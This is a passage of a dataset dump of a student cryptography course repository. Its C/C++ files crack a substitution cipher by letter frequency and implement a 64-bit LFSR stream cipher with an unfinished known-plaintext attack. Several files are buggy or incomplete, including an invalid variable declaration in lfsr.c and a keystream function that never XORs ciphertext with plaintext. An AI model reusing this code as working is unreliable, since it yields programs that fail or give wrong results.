variable depending on whats read into it. stop at the 27th character. after that point to null.\n" }, { "alpha_fraction": 0.692169189453125, "alphanum_fraction": 0.7020702362060547, "avg_line_length": 22.595745086669922, "blob_id": "160665d44b12a1c6355340a1491f967d6869c4c7", "content_id": "c3de38947fa7bd5f15c1ab11188d48271c992d91", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1111, "license_type": "no_license", "max_line_length": 110, "num_lines": 47, "path": "/Project_1/Final_Files/sol_sac.cpp", "repo_name": "goggalor1954/CSCI360", "src_encoding": "UTF-8", "text": "/*\nJames Roesemann\nCSCI360\nproject 1\nsol_sac.cpp\n\nopens and reads in a file named ciphertext.txt\noutputs to cipher_freq.txt \ncipher_freq.txt contains, in decending order, a row containing the pairs <letter>, <rel_freq> \nletter is a printable ascii and rel_freq is a floting point number is the relitive frequency of its occurance.\n*/\n#include <iostream>\n#include <list>\n#include <fstream>\n#include \"charBox.h\"\n#include 
\"statAnalyzer.h\"\nusing namespace std;\n\nint main()\n{\n\tlist<charBox> alphaChars;\n\tbuildCharBox(&alphaChars);\n\tfstream infile, outfile;\n\tchar tempIn;\n\tinfile.open(\"ciphertext.txt\");\n\twhile(!infile.eof())\n\t{\n\t\ttempIn=infile.get();\n\t\tif(tempIn>=32 && tempIn<=126)\n\t\t{\n\t\t\tcharCount( &alphaChars, tempIn);\n\t\t}\n\t}\n\tinfile.close();\nsetFreq(&alphaChars, getTotal(alphaChars));\n\toutfile.open(\"cipher_freq.txt\", std::fstream::out | std::fstream::trunc);\n\tcharBox temp;\n\twhile(!alphaChars.empty()) \t\n\t{\n\t\ttemp=getHighest(alphaChars, 0, alphaChars.front().getName());\n\t\toutfile << temp.getName() << \", \"<< temp.getFreq() << endl;\n\t\tremoveCharBox( &alphaChars, temp.getName());\n\t}\n\toutfile.close();\n\n\treturn 0;\n}\n\n\n" }, { "alpha_fraction": 0.6614349484443665, "alphanum_fraction": 0.665919303894043, "avg_line_length": 24.485713958740234, "blob_id": "977a13550e6d5374e4a2a2f7b28282000a852c76", "content_id": "30b3ecd3c27c166b2707083bc42c4369f6a48056", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1784, "license_type": "no_license", "max_line_length": 153, "num_lines": 70, "path": "/Project_1/charBox-a.h", "repo_name": "goggalor1954/CSCI360", "src_encoding": "UTF-8", "text": "#ifndef CHARBOX_H\n#define CHARBOX_H\n\nclass charBox //A class conting a char variable, an int variable to count the occurance of the char, and a pointer that point to the next charBox object.\n{\n\tprivate:\n\tchar name;\n\tint count;\n\tcharBox* next;\n\t\n\tpublic:\n\tcharBox()\n\t{\n\t\tname='\\0';\n\t\tcount=0;\n\t\tnext=NULL;\n\t}\n\tcharBox(charBox &x)\n\t{\n\t\tname='\\0';\n\t\tcount=0;\n\t\tnext=&x;\n\t}\n\tchar getName(){return name;} //return the char value name\n\tint getCount(){return count;} //returns the int value count\n\tcharBox* getNext(){return next;} //returns the pointer valuse next\n\tvoid setName(char x){name=x;} //sets the char value name\n\tvoid add(){count++;} 
//increments the count value by 1\n\tvoid setNext(charBox &x){next=&x;} // sets the pointer value next to the entered charBox object.\n\tvoid makeNext()\n\t{\n\t\tcharBox* p = new charBox();\n\t\tthis->next=p;\n\t\t//this->next->next==NULL;\n\t}\n};\n\n\n\tvoid charBuild(charBox *charBoxVal, int x) // recursivly builds a charBox linked list of size x\n{\n\tif(x==0) return;\n\tcharBox p;\n\tcharBoxVal->setNext(p);\n\tcharBuild(charBoxVal->getNext(), x-1);\n\t//std::cout << \"This: \" << charBoxVar << std::endl; //test\n\t//std::cout << \"next: \" << charBoxVar->getNext() << std::endl; //test\n}\n\tvoid aplhaFill(charBox *charBoxVal, char x) // recursivly fills the name values of the entered charBox from A-Z\n\t{\n\t\tcharBoxVal->setName(x);\n\t\tstd::cout << x << std::endl;\n\t\tstd::cout << charBoxVal->getNext() << std::endl; //test\n\t\tif(charBoxVal->getNext()==NULL) return;\n\t\taplhaFill(charBoxVal->getNext(), x+1);\n\t}\n\n\tvoid aplhaFill(charBox *charBoxVal) //sets the first name value of charBoxVal to ' ', fills in the rest of the the alphabet A-Z\n\t{\n\t\tstd::cout << charBoxVal->getNext() << std::endl; //test\n\t\tcharBoxVal->setName(' ');\n\t\taplhaFill(charBoxVal, 'A');\n\t}\n\t\t\n\n\n\n\n\n\n#endif\n" }, { "alpha_fraction": 0.6468658447265625, "alphanum_fraction": 0.6729407906532288, "avg_line_length": 25.564220428466797, "blob_id": "04269b3ecfb7bd340371d888c3b55af16da7d22b", "content_id": "63c8f577c639f9ddf43470401650cd73afba5d47", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 5791, "license_type": "no_license", "max_line_length": 400, "num_lines": 218, "path": "/Project_2/project_2/lfsr.c", "repo_name": "goggalor1954/CSCI360", "src_encoding": "UTF-8", "text": "/*\nCode for 64 bit LFSR\nHunter Johnson\n9/15/17\n\nmodified by: James Roesemann\n10/12/17\n*/\n\n#include <stdint.h>\n#include <stdlib.h>\n#include <stdio.h>\n#include <assert.h>\n\n/*The following struct will represent an LFSR with a 
64 bit state.\n The taps are represented by a 64 bit number, where the ith bit (from the right)\n corresponds to p_i (in the notation of the textbook).\n The uint64_t is a 64 bit unsigned integer.\n There is a small chance that this code may behave unexpectedly if compiled on Windows or Mac.\n Please let me know if you get issues.\n It compiles and runs under clang and gcc. */\ntypedef struct {\n\tuint64_t state;\n\tuint64_t taps;\n} LFSR;\n\nint parity(uint64_t N)\n{\n/* Return the parity of N*/\n\tint p = __builtin_parity(N); // parity of first 32 bits\n\tN = __builtin_bswap64(N); //move back 32 to the front\n\treturn (p+__builtin_parity(N))%2; //overall parity\n}\n\nint read_lfsr(LFSR* L)\n{\n/*Return the current output bit (the rightmost bit of the state variable) */\n\n\n/* You implement this*/\n\treturn L->state%2;\n\n}\n\nvoid next_state(LFSR* L)\n{\n/*Takes LFSR.\n Returns nothing.\n Side effect: advances L to next state.(shift to the right and replace leftmost bit with appropriate value)\n*/\n\n /* You implement this.\n Hint: make use of the parity() function provided above*/\n int lib=parity(L->state & L->taps);\n if(lib==1) L->state = (L->state >>1) | 0x8000000000000000;\n else L->state = (L->state >> 1);\n\n}\n\nvoid init_LFSR(LFSR* L, uint64_t initial_state, uint64_t taps)\n{\n/*Initialize with state and taps*/\n\tL->state = initial_state;\n\tL->taps = taps;\n}\n\n\nunsigned char get_stream_byte(LFSR* L)\n{\n/*Return one byte of keystream.\n Note that the byte fills up from left to right.\n*/\n\tunsigned char C = 0;\n\tint i = 7;\n\tfor(;i>=0;i--)\n\t{\n\t\t//printf(\"%d\\n\",read_lfsr(L));\n\t\tC |= (read_lfsr(L)<<i);\n\t\tnext_state(L);\n\t}\n\t//printf(\"\\t%d\\n\",C);\n\treturn C;\n}\n\nvoid encrypt(char* pt,char* ct,LFSR *L)\n{\n/*Use the LFSR stream cipher to encrypt\n the file named pt (plaintext) and write the\n output to the file named ct (ciphertext);\n*/\n\tFILE* PT = fopen(pt,\"r\");\n\tFILE* CT = fopen(ct,\"w\");\n\tassert(PT); //make sure 
files opened okay\n\tassert(CT);\n\tint c;\n\twhile((c=getc(PT))!=-1)\n\t{\n\t\tunsigned char sb = get_stream_byte(L);\n\t\tfputc(sb^c,CT);\n\t}\n\tfclose(PT);\n\tfclose(CT);\n}\n\nvoid decrypt(char* pt,char* ct,LFSR *L){\n/*Make sure L has been reset to the initial state*/\n\tencrypt(pt,ct,L);\n}\n\nvoid get_128_keystream_bits(char* ct,char* kpt)\n{\n/*This function takes 16 bytes of ciphertext and 16 bytes of\n known plaintext.\n The output is a file named \"key_stream.txt\" that contains 128 bits\n of keystream. The stream is represented in ASCII, with 128 lines, and\n either a \"0\" or a \"1\" on each line. */\n\n/*This is the plaintext attack in which you recover 2m keystream bits.\n\n You implement this.\n//idea for this. for loop to get the first 16 chatacter, maybe store them. combine them to a 64 bit int somehow in order. ah, i know. combine them into a word. no. i think you do an unsigned 64bit, shift by 8 and add the bytes fof the nex tcharacter. fill untill done. no. outoouting to a text file. i can just mod 2 to get the rightmost bit. store it. right shift, and when done output line by line/\n*/\n/*\ncreates an 8 value int array for stroage purposes.\nreads in 16 characters of ct and then kpt\nuses a for loop to get the rightmost bit, store it in the array and shift right untill the end of the character is reached. \noutputs the bit values one line at a time to the file \"key_stream.txt\"\n*/\n//i'm uncluar about what order i'm ment to output the bits. do i houtput the leftmost bit of the characters first or the rightmost bit? acoring to him leastsignificat bit first. 
ie rightmost bit.\n\tunsigned char C;\n\tFILE* CT = fopen(ct,\"r\");\n\tFILE* KPT = fopen(kpt,\"r\");\n\tFILE* KST = fopen(\"key_stream.txt\",\"wb\");\n\tassert(CT);\n\tassert(KPT);\n\tassert(KST);\n\t//read in 16 characters from ct, output their bit values to kst\n\tfor(int i=0; i<16; i++)\n\t{\n\t\tC = getc(CT);\n\t\t//output bits to key_stream.txt\n\t\tfor(int j=0; j<8; j++)\n\t\t{\n\t\t\tfputc(C%2, KST);\n\t\t\tfputc('\\n', KST);\n\t\t\tC=C >>1;\n\t\t}\n\t}\n\t//read in 16 characters from kpt, output their bit values to kst\n\tfor(int i=0; i<16; i++)\n\t{\n\t\tC = getc(KPT);\n\t\t//output bits to key_stream.txt\n\t\tfor(int j=0; j<8; j++)\n\t\t{\n\t\t\tfputc(C%2, KST);\n\t\t\tfputc('\\n', KST);\n\t\t\tC=C >>1;\n\t\t}\n\t}\n\tfclose(CT);\n\tfclose(KPT);\n\tfclose(KST);\n}\n\n\nvoid shape_keystream()\n{\n/* This function opens the file \"key_stream.txt\" created by\n get_128_keystream_bits(). It uses this data to create a file called\n \"S.mat.sage\" which is a 64x64 matrix of keystream bits of the form\n discussed in the project description. It also creates a vector\n (a 64x1 matrix) of keystream bits of the form described in the\n project description. This is stored in a file called \"V.mat.sage\" */\n\n //See the file matrix.sagews for examples of what the output should look like.\n\n /*You implement this*/\n}\n//function that gets the first 8 bytes of the plaintest, prints it to the screen inorder to set initial state. 
remove when done.\nvoid getFirstEight()\n{\n\tunsigned char C;\n\tuint64_t firstEight=0;\n\tFILE* PT = fopen(\"toy_pt.txt\",\"r\");\n\tfor(int i=0; i<8; i++)\n\t{\n\t\tC = getc(PT);\n\t\tfor(int j=0; j<8; j++)\n\t\t{\n\t\t\tprintf(\"%d\",C%2);\n\t\t\tfirstEight |= C%2;\n\t\t\tC = C>> 1;\n\t\t}\n\t}\n\tprintf(\"\\n\");\n\tfclose(PT);\t\n}\n//hex value of first 8 bytes of \n\n\nint main()\n{\n\tLFSR L;\n\t//uint64_t initial_state = 0xbeefcafebabecab1; //original initial state.\n\tuint64_t 0xF7DDFD2A16A6040A;\n\tuint64_t taps = 0xdeaddeedacedface;\n\tinit_LFSR(&L,initial_state,taps);\n\tencrypt(\"toy_pt.txt\",\"ct.dat\",&L);\n\tinit_LFSR(&L,initial_state,taps);\n\tdecrypt(\"ct.dat\",\"toy_ot.txt\",&L);\n\t//get_128_keystream_bits(\"target_ciphertext\",\"<you fill this in>\");\n\t//shape_keystream();\n\n//test\n\tgetFirstEight();\n\t//charTest('G');\n}\n" }, { "alpha_fraction": 0.5877193212509155, "alphanum_fraction": 0.6184210777282715, "avg_line_length": 12.411765098571777, "blob_id": "3122581ae72ed4fc2ab192af9d0220154ee70735", "content_id": "82145b4e5854b8a96bd83670464d386661b28e97", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 456, "license_type": "no_license", "max_line_length": 38, "num_lines": 34, "path": "/Project_1/decode2.cpp", "repo_name": "goggalor1954/CSCI360", "src_encoding": "UTF-8", "text": "//james Roesemann\n//CSCi360-01\n//Project 1\n#include <iostream>\n#include \"charBox.h\"\nusing namespace std;\n\n//test function\nvoid test(charBox* x, int y)\n{\n\tif(x->getNext()==NULL)\n\t{\n\t\treturn;\n\t}\n\tstd::cout << y << \": \" << &x << endl;\n\ttest(x->getNext(), y-1);\n\treturn;\n}\n\nint main()\n{\n\tcharBox alphaChar;\n\tcharBox cryptoChar;\n\tcharBuild(&alphaChar, 26);\n\t//charBuild(cryptoChar, 26);\n//test\n\ttest(&alphaChar, 30); //test\n\n\t//aplhaFill(& alphaChar);\n\t\n\n\n\treturn 0;\n};\n" }, { "alpha_fraction": 0.7174749970436096, "alphanum_fraction": 0.7251732349395752, 
"avg_line_length": 20.295082092285156, "blob_id": "9c8a750364ac84010570a757befbc4eb0ae8b4b5", "content_id": "6acf554f70c32f2fa4840736fe74918e6754be5c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1299, "license_type": "no_license", "max_line_length": 110, "num_lines": 61, "path": "/Project_1/Final_Files/sol_cracker.cpp", "repo_name": "goggalor1954/CSCI360", "src_encoding": "UTF-8", "text": "/*\nJames Roesemann\nCSCI360\nproject 1\nsol_cracker.cpp\n\nread in 3 files, ciphertext.txt, cipher_freq.txt, and corpus_freq.txt.\nOutputs the file cracked.txt.\ncracked is the result of replaceing each character of ciphertext.txt with a capital letter of space character.\nThe characters a replaced by occurance of frequency. this will not be a perfect decryption.\n*/\n\n#include <iostream>\n#include <list>\n#include <fstream>\n#include \"charBox.h\"\n#include \"statAnalyzer.h\"\nusing namespace std;\n\n\nint main()\n{\n\tfstream infile, outfile;\n\tlist<charBox> corresponding;\n\tchar temp1, temp2;\n\tstring temp;\n\n\tbuildCharBox(&corresponding);\n\tinfile.open(\"corpus_freq.txt\");\n\t//reads in the characters from corpus_freq.txt\n\twhile(getline(infile, temp))\n\t{\n\t\tcharCount(&corresponding, temp[0]);\n\t}\n\tinfile.close();\n\n\tinfile.open(\"cipher_freq.txt\");\n\t//reads in the characters from cipher_freq.txt\n\twhile(getline(infile, temp))\n\t{\n\t\tcryptInsert(&corresponding, temp[0]);\n\t}\n\tinfile.close();\n\tinfile.open(\"ciphertext.txt\");\n\toutfile.open(\"cracked.txt\", std::fstream::out | std::fstream::trunc);\n\t//reads in characters from ciphertext.txt. 
outputs the decrypted characters to cracked.txt\n\twhile(!infile.eof())\n\t{\n\t\tdecrypt(&corresponding, outfile, infile.get());\n\t}\n\tinfile.close();\n\toutfile.close();\n\t\n\n\t//test\n\n\n\t\n\t\t\n\treturn 0;\n}\n" }, { "alpha_fraction": 0.701684832572937, "alphanum_fraction": 0.7195242643356323, "avg_line_length": 27.02777862548828, "blob_id": "61fa4f7295c20916ee313fd9c9459405d962a8c2", "content_id": "f73ac7e294289d1cd6b1c97e9c6611367d735a5b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1009, "license_type": "no_license", "max_line_length": 180, "num_lines": 36, "path": "/Project_1/Final_Files/sol_cleaner.cpp", "repo_name": "goggalor1954/CSCI360", "src_encoding": "UTF-8", "text": "/*\nJames Roesemann\nCSCI360\nproject 1\nsol_cleaner.cpp\n\nOpens and reads in a file named corpus.txt\nOutputs a file name corpus_clean.txt\ncorpus_clean.txt Contains the same characters as corpus.txt, except all not-alphabetical or space characters have been removed, and all alphabetical characters have been capliized.\n\nI altered this slightly to count new lines as spaces because i noticed alot of words ended up geting combined and i was worried it would throw off the statistical analysis.\n*/\n#include <iostream>\n#include <fstream>\nusing namespace std;\n\nint main()\n{\n\tfstream infile, outfile;\n\tchar temp;\n\tinfile.open(\"corpus.txt\");\n\toutfile.open(\"corpus_clean.txt\" , std::fstream::out | std::fstream::trunc);\n\t\n\twhile(!infile.eof())\n\t{\n\t\tinfile.get(temp);\n\t\t//if the character is a lowercase letter, changers it to an upper case letter.\n\t\tif(temp<=122 && temp >=97){temp=temp-32;}\n\t\tif(temp=='\\n'){temp=' ';}\n\t\tif(temp<=90 && temp>=65 || temp==32){outfile << temp;}\n\t}\n\tinfile.close();\n\toutfile.close();\n\n\treturn 0;\n}\n" }, { "alpha_fraction": 0.6385786533355713, "alphanum_fraction": 0.6822335124015808, "avg_line_length": 21.730770111083984, "blob_id": 
"edc242c655f21597ba3e42e3f2b802ecba85b129", "content_id": "1c6ff8d57c51ad7a4cdc18be2fde08d55a1feb5f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 2955, "license_type": "no_license", "max_line_length": 179, "num_lines": 130, "path": "/Project_2/project_2/lfsr-dev.c", "repo_name": "goggalor1954/CSCI360", "src_encoding": "UTF-8", "text": "/*\nCode for 64 bit LFSR\nHunter Johnson\n9/15/17\n\nmodified by: James Roesemann\n10/12/17\nthis program is a modification of lfsr.c for the purpose of developing the missing functions of that program.\n*/\n\n/*\nto do:\nread_lfsr \t\t\tdone\nnext_state\nget_128_keystream\nshape_keystream\n*/\n\n\n#include <stdint.h>\n#include <stdlib.h>\n#include <stdio.h>\n#include <assert.h>\n\n/*The following struct will represent an LFSR with a 64 bit state.\n The taps are represented by a 64 bit number, where the ith bit (from the right)\n corresponds to p_i (in the notation of the textbook).\n The uint64_t is a 64 bit unsigned integer.\n There is a small chance that this code may behave unexpectedly if compiled on Windows or Mac.\n Please let me know if you get issues.\n It compiles and runs under clang and gcc. */\ntypedef struct {\n\tuint64_t state;\n\tuint64_t taps;\n} LFSR;\n\nvoid init_LFSR(LFSR* L, uint64_t initial_state, uint64_t taps)\n{\n/*Initialize with state and taps*/\n\tL->state = initial_state;\n\tL->taps = taps;\n}\nint parity(uint64_t N)\n{\n/* Return the parity of N*/\n\tint p = __builtin_parity(N); // parity of first 32 bits\n\tN = __builtin_bswap64(N); //move back 32 to the front\n\treturn (p+__builtin_parity(N))%2; //overall parity\n}\n\n\n\n//everyhting below is something i had to modify. 
everything above came with the program\n\n\n\nint read_lfsr(LFSR* L)\n{\n/*Return the current output bit (the rightmost bit of the state variable) */\n//get the rghtmost bit by returning L mod 2\n\treturn L->state%2;\n}\n\nvoid next_state(LFSR* L)\n{\n/*Takes LFSR.\n Returns nothing.\n Side effect: advances L to next state.(shift to the right and replace leftmost bit with appropriate value)\n*/\n\n /* You implement this.\n Hint: make use of the parity() function provided above*/\n int mib=parity(L->state & L->taps);\n if(mib==1) L->state = (L->state >>1) | 0x8000000000000000;\n else L->state = (L->state >> 1);\n\n}\n\n\n\n//showbits function taken from wikipedia for testing\nvoid showbits(unsigned int x)\n{\n int i; \n for(i=(sizeof(int)*8)-1; i>=0; i--)\n (x&(1u<<i))?putchar('1'):putchar('0');\n \n printf(\"\\n\");\n}\n//also copied for testing\n void bin(uint64_t n)\n{\n\n if (n > 1)\n bin(n/2);\n \n\n printf(\"%lu\", n % 2);\n}\n//0x80000000 in unsighned int is the equivilent of an int value with only one 1 on the leftmost bit and all zeros after. using this value to add 1 on the leftmost bit when needed.\n//above is 32 bit. need to replace it iwth the 64 bit equivlent. \tj = (j >>1) | 0x80000000;\n//0x8000000000000000 64bit hex equivelent\n\n//i think this works, the problem is i'm really confused about wht athe taps are for. 
read/look up a video on lfsr before using this.\n\nint main()\n{\n\tLFSR L;\n\tuint64_t initial_state = 0xbeefcafebabecab1;\n\tuint64_t taps = 0xdeaddeedacedface;\n\tinit_LFSR(&L,initial_state,taps);\n\t//everyhing after this i need to fill in myself\n\n\t//test\n\tuint64_t i;\n\t//printf(\"%d\\n\", i);\n\ti=parity(L.taps & L.state);\n\tshowbits(3);\n\tbin(3);\n\tprintf(\"\\n\");\n\n\n\n\n\n\n\n\n\n}\n" }, { "alpha_fraction": 0.7046263217926025, "alphanum_fraction": 0.7168841361999512, "avg_line_length": 28.4069766998291, "blob_id": "5c47b8ca48a947066a79898fb2e54616bf29bb0e", "content_id": "c39db3ad243d5cbb4dbb031775e2fc5b98da2ad9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2529, "license_type": "no_license", "max_line_length": 569, "num_lines": 86, "path": "/Project_1/decode3.cpp", "repo_name": "goggalor1954/CSCI360", "src_encoding": "UTF-8", "text": "//james Roesemann\n//CSCi360-01\n//Project 1\n#include <iostream>\n#include <queue>\n#include \"charBox.h\"\nusing namespace std;\n\n//fills the queue x with 26 elements\nvoid buildCharBox(queue<charBox>* x)\n{\n\tfor(int i=0; i<27; i++){x->push(charBox());}\n}\n\n//if x == 90, set the name value of the element to x. thrn returns the element. if not, pops the first element to y, setes its name to x. calls alphaChar buils with x+1. pushes y into alphaCharBuilds return. the nreturns boxVar.\nqueue<charBox>* alphaCharBuild( queue<charBox>* boxVar, int x)\n{\n\tif(boxVar->empty()) {return boxVar;}\n\tcharBox y=boxVar->front();\n\tboxVar->pop();\n\ty.setName(x);\n\tboxVar=alphaCharBuild(boxVar, x+1);\n\tboxVar->push(y);\n\treturn boxVar;\n}\n//set the first elements of the queue's name value to. ' '. 
Calls buildAlphaChar to fill in A-Z returns the queue\nqueue<charBox>* alphaCharBuild( queue<charBox>* boxVar)\n{\n\tcharBox y=boxVar->front();\n\tboxVar->pop();\n\ty.setName(' ');\n\tboxVar=alphaCharBuild(boxVar, 65);\n\tboxVar->push(y);\n\treturn boxVar;\n}\n//recursivly counts the number of occurances of the entered character. doulbes as a way to enter new characters into the cryptoChars queue. if the elemets name variable == '\\0' then it assignes the character to name , increments count by 1 and returns. if the entered character == name then it increments that character element by 1. if not pops the boxVar and calls chracterCount untill it finds the character or boxVar is empty. when entering text from moby dick the entered character must already set to Upper case. actually all characters alreay will be capatlized.\n \nqueue<charBox>* charCount( queue<charBox>* boxVar, char charVal)\n\n{\n\tif(boxVar->empty()) { return boxVar;}//it should only get here when we are counting characters from moby dick. 
cryptoText should have exactly 26 types of characters.\n\tif(boxVar->front().getName()=='\\0')\n\t{\n\t\tboxVar->front().setName(charVal);\n\t\tboxVar->front().add();\n\t\treturn boxVar;\n\t}\n\tif(boxVar->front().getName()==charVal)\n\t{\n\t\tboxVar->front().add();\n\t\treturn boxVar;\n\t}\n\tcharBox temp=boxVar->front();\n\tboxVar->pop();\n\tboxVar=charCount(boxVar, charVal);\n\tboxVar->push(temp);\n\treturn boxVar;\n}\n//\n\n\nint main()\n{\n\tqueue<charBox> alphaChars;\n\tqueue<charBox> cryptoChars;\n\n\tbuildCharBox(&alphaChars);\n\tbuildCharBox(&cryptoChars);\n\n\talphaCharBuild(&alphaChars);\n\n\t//TEST\n\twhile(!alphaChars.empty())\n\t{\n\t\tcout << alphaChars.front().getName() << endl;\n\t\talphaChars.pop();\n\t}\n\t\n\n\n\treturn 0;\n}\n\n\n\n\t//if(charValcharVal<=122 && charVal>=97){charVal=charVal-32;} //in case its lowercase,\n" }, { "alpha_fraction": 0.7108433842658997, "alphanum_fraction": 0.7108433842658997, "avg_line_length": 12.833333015441895, "blob_id": "147bbf9a83ba5eddb91be2574dda2b1190f9f2de", "content_id": "41e1311771b53e09349ab9198bb73b6510a5f629", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 83, "license_type": "no_license", "max_line_length": 29, "num_lines": 6, "path": "/Project_3/project_3/notes.txt", "repo_name": "goggalor1954/CSCI360", "src_encoding": "UTF-8", "text": "notes.\n\n-K when specifiying pw in hex\n-k when just pasword.\n\n-iv only used with -K\n" }, { "alpha_fraction": 0.7097500562667847, "alphanum_fraction": 0.7122269868850708, "avg_line_length": 30.94964027404785, "blob_id": "0c04c2d3312b3c4e4b029564357bdf89cb038bca", "content_id": "2ed63686c9c232cd3bcdb8b5c48702c86911981e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4441, "license_type": "no_license", "max_line_length": 166, "num_lines": 139, "path": "/Project_1/Final_Files/statAnalyzer.h", "repo_name": "goggalor1954/CSCI360", "src_encoding": "UTF-8", 
"text": "#ifndef STATANALYZER_H\n#define STATANALYZER_H\n#include \"charBox.h\"\n#include <iostream>\n#include <list>\n#include <fstream>\n\n//fills the std::list x with 27 elements \nvoid buildCharBox(std::list<charBox>* x)\n{\n\tfor(int i=0; i<27; i++){x->push_front(charBox());}\n}\n\n//recursivly counts the number of occurances of the entered character. \n//doubles as a way to enter new characters into the std::list. \n//if the elemets name variable == '\\0' then it assignes the character to name , increments count by 1 and returns boxVar. \n//if the entered character == name then it increments that character element by 1 and returns boxVar.\n// if not it pop_fronts the boxVar and calls charCount untill it finds the character or boxVar is empty. \n \nstd::list<charBox>* charCount( std::list<charBox>* boxVar, char charVal)\n{\n\t//if boxVar is empty, return\n\tif(boxVar->empty()) { return boxVar;}\n\t//if the name of the front of boxVar is empty, addign it a name, increment it, and return box var.\n\tif(boxVar->front().getName()=='\\0')\n\t{\n\t\tboxVar->front().setName(charVal);\n\t\tboxVar->front().add();\n\t\treturn boxVar;\n\t}\n\t//if the front name of boxVar == charVal, increment it and return. \n\tif(boxVar->front().getName()==charVal)\n\t{\n\t\tboxVar->front().add();\n\t\treturn boxVar;\n\t}\n\t//if not, pop_front the front value of boxVar, store it, and pass it and char val to charCount. push_front it back into box var once it returns. 
then return box var.\n\tcharBox temp=boxVar->front();\n\tboxVar->pop_front();\n\tboxVar=charCount(boxVar, charVal);\n\tboxVar->push_front(temp);\n\treturn boxVar;\n}\n//returns an int with the total number of characters \nint getTotal(std::list<charBox> boxVar)\n{\n\tint total=0;\n\twhile(!boxVar.empty())\n\t{\n\t\ttotal+=boxVar.front().getCount();\n\t\tboxVar.pop_front();\n\t}\n\treturn total;\n}\n//computes the frequency of all the elements in the std::list.\nstd::list<charBox>* setFreq( std::list<charBox>* boxVar, int total)\n{\n\tif(boxVar->empty()){return boxVar;}\n\tboxVar->front().setFreq(total);\n\tcharBox temp=boxVar->front();\n\tboxVar->pop_front();\n\tboxVar=setFreq(boxVar, total);\n\tboxVar->push_front(temp);\n\treturn boxVar;\n}\n\n//searches the std::list for the highest frequency element, outputs it to the given fstream. returnes the element to be deleted from the std::list.\ncharBox getHighest( std::list<charBox> boxVar, float highest, charBox element)\n{\n\t//if boxVar is empty, return element.\n\tif(boxVar.empty())\n\t{\n\t\treturn element;\n\t}\n\t//if the top of boxVar has a higher freq then highest, assign it to element and it's frequency to highest.\n\tif(boxVar.front().getFreq() > highest)\n\t{\n\t\thighest=boxVar.front().getFreq();\n\t\telement=boxVar.front();\n\t}\n\tboxVar.pop_front();\n\treturn getHighest(boxVar, highest, element);\n}\n//searches through the std::list and remove the matching element.\nstd::list<charBox>* removeCharBox(std::list<charBox>* boxVar, char name)\n{\t\n\tif(boxVar->empty()){return boxVar;}\n\tif(boxVar->front().getName() == name)\n\t{\n\t\tboxVar->pop_front();\n\t\treturn boxVar;\n\t}\n\tcharBox temp =boxVar->front();\n\tboxVar->pop_front();\n\tboxVar=removeCharBox(boxVar, name);\n\tboxVar->push_front(temp);\n\treturn boxVar;\n\t\n}\n//modified version of charCount that just reads in cryptNamevalues for charBox.\nstd::list<charBox>* cryptInsert( std::list<charBox>* boxVar, char charVal)\n{\n\t//if boxVar is 
empty, return\n\tif(boxVar->empty()) { return boxVar;}\n\t//if the name of the front of boxVar is empty, addign it a name, increment it, and return box var.\n\tif(boxVar->front().getCryptName()=='\\0')\n\t{\n\t\tboxVar->front().setCryptName(charVal);\n\t\treturn boxVar;\n\t}\n\tif(boxVar->front().getCryptName()==charVal){return boxVar;}\n\t//if not, pop_front the front value of boxVar, store it, and pass it and char val to charCount. push_front it back into box var once it returns. then return box var.\n\tcharBox temp=boxVar->front();\n\tboxVar->pop_front();\n\tboxVar=cryptInsert(boxVar, charVal);\n\tboxVar->push_front(temp);\n\treturn boxVar;\n}\n//searches boxVar for a cryptName that matches charVal. outputs the character name to the fstream.\nstd::list<charBox>* decrypt( std::list<charBox>* boxVar, std::fstream &outfile, char charVal)\n{\n\t//if boxVar is empty\n\tif(boxVar->empty()){return boxVar;}\n\t//if the character is found\n\tif(boxVar->front().getCryptName()==charVal)\n\t{\n\t\toutfile << boxVar->front().getName();\n\t\treturn boxVar;\n\t}\n\tcharBox temp=boxVar->front();\n\tboxVar->pop_front();\n\tboxVar=decrypt(boxVar, outfile, charVal);\n\tboxVar->push_front(temp);\n\treturn boxVar;\n}\n\n\n\n#endif\n" }, { "alpha_fraction": 0.5980392098426819, "alphanum_fraction": 0.6004902124404907, "avg_line_length": 17.71559715270996, "blob_id": "9722a262c4216ba48bffb3f8fbca2790df0188d7", "content_id": "21efee688d2edaf103738f1e1656e66cfbdd35b9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2040, "license_type": "no_license", "max_line_length": 174, "num_lines": 109, "path": "/Project_1/Final_Files/sol_corrections.cpp", "repo_name": "goggalor1954/CSCI360", "src_encoding": "UTF-8", "text": "/*\nJames Roesemann\nCSCI360\nproject 1\nsol_corrections.cpp\n\n\nthis program reads in the characters from cracked.txt and outputs a file called clear.txt\ncharacter substitiutions are made where apropriate tobased on 
